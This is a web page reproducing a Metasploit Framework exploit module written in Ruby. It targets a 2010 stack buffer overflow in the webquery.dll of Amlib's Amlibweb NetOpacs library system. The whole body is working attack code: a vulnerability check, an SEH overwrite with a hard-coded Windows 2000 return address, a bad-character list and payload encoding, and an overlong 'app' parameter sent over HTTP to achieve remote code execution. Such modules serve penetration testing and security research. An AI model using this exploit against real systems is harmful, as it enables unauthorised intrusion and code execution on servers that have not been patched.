Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
19669 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in Amlib's Amlibweb

19
          Library Management System (NetOpacs). The webquery.dll

20
          API is available through IIS requests. By specifying

21
          an overly long string to the 'app' parameter, SeH can be

22
          reliably overwritten allowing for arbitrary remote code execution.

23
          In addition, it is possible to overwrite EIP by specifying

24
          an arbitrary parameter name with an '=' terminator.

25
        },

26
        'Author' => [ 'aushack' ],

27
        'Arch' => [ ARCH_X86 ],

28
        'License' => MSF_LICENSE,

29
        'References' => [

30
          [ 'OSVDB', '66814' ],

31
          [ 'BID', '42293' ],

32
          [ 'URL', 'http://www.aushack.com/advisories/' ],

33
        ],

34
        'Privileged'	=> true,

35
        'DefaultOptions' => {

36
          'EXITFUNC'	=> 'thread',

37
          'AllowWin32SEH' => true

38
        },

39
        'Payload' => {

40
          # 'Space'			=> 600,

41
          'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",

42
          'EncoderType'	=> Msf::Encoder::Type::AlphanumMixed,

43
          'DisableNops' => true,

44
          'StackAdjustment' => -3500,

45
        },

46
        'Platform' => ['win'],

47
        'Targets' => [

48
          # aushack - Tested OK 20100803 w2k IIS5

49
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5

50
          # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.

51
        ],

52
        'DisclosureDate' => '2010-08-03', # 0day

53
        'DefaultTarget' => 0,

54
        'Notes' => {

55
          'Reliability' => UNKNOWN_RELIABILITY,

56
          'Stability' => UNKNOWN_STABILITY,

57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
        }

59
      )

60
    )

61


62
    register_options(

63
      [

64
        Opt::RPORT(80),

65
      ]

66
    )

67
  end

68


69
  def check

70
    connect

71


72
    rand = Rex::Text.rand_text_alpha(10)

73


74
    sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")

75
    res = sock.get_once

76
    disconnect

77


78
    if (res.to_s =~ /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/)

79
      if ($1 == rand)

80
        return Exploit::CheckCode::Vulnerable

81
      end

82
    end

83
    Exploit::CheckCode::Safe

84
  end

85


86
  def exploit

87
    connect

88
    seh = generate_seh_payload(target.ret)

89


90
    buffer = Rex::Text.rand_text_alphanumeric(3028) + seh

91
    sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n"

92
    sock.put(sploit + "\r\n\r\n")

93


94
    handler

95
    disconnect

96
  end

97
end

98


99